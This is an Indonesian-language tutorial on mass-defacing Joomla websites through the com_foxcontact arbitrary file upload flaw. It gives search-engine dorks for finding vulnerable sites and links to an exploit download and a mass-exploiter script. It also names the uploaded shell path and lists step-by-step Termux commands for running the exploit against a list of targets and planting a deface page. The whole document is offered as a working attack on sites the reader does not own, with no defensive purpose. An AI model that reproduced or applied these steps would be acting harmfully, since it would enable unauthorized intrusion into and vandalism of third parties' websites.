Tutorial - Cara Deface Joomla com_foxcontact

COPYRIGHTS

======================================================================

Referensi: https://www.draxploit.web.id/2020/07/cara-deface-joomla-comfoxcontact-with_6.html

Download Tools Exploit: http://www.mediafire.com/file/yr1wiecuqad14vc/fox.zip

Shell Path: http://www.site.com/components/com_foxcontact/_fire.php

Exploit Command: python3 exploit.py --url http://site.com --cid 123

======================================================================

Keyword:

Cara deface joomla arbitary file upload, Cara Deface Joomla com_foxcontact, Deface arbitary file upload, Tutorial joomla mass deface, WLB-2018040066, Dork Joomla com_foxcontact, Auto deface joomla.

Persiapan~ 

-dork : "powered by fox contact" atau "inurl:index.php?option=com_foxcontact"

-tools auto exploit dan mass exploiter joomla com_foxcontact : https://pastebin.com/raw/eRCNMehy 

-termux 

Langkah-langkah

1. Pertama kalian buka toolsnya lalu salin semua source codenya ke aplikasi text editor atau sebagainya. contoh: anwriter

2. Kalian edit script dibawah, menjadi:

private $hacker = "NICK HACKER KALIAN";

private $deface  = 'SCRIPT DEFACE KALIAN YANG SUDAH DI ENCODE MENJADI BASE64';

$this->file->deface = "nakanosec.html";

3.Setelah mengedit atau mengubah bagian-bagian ini, simpan, salin semua kode sumber dan buka apk termux.

4.Jalankan Exploit dengan perintah dibawah ini

$pkg install php nano -y

$pip2 install requests

$nano exp.php

 5.Pastekan seluruh source code yang telah di salin tadi

Simpan code dengan menekan

ctrl + x + y + enter

Kemudian kumpulkan semua list target yang kalian punya dan simpan menjadi list.txt di termux dengan mengetik

nano list.txt

Klik Ctrl + x + y + enter

5.Kemudian Jalankan tools dengan perintah

php exp.php list.txt

 

6.Tunggu sampai proses selesai lalu cek result atau hasil di file result_foxcontact.txt

Hasil: http://www.namaweb.com/nakanosec.html/

Nakanosec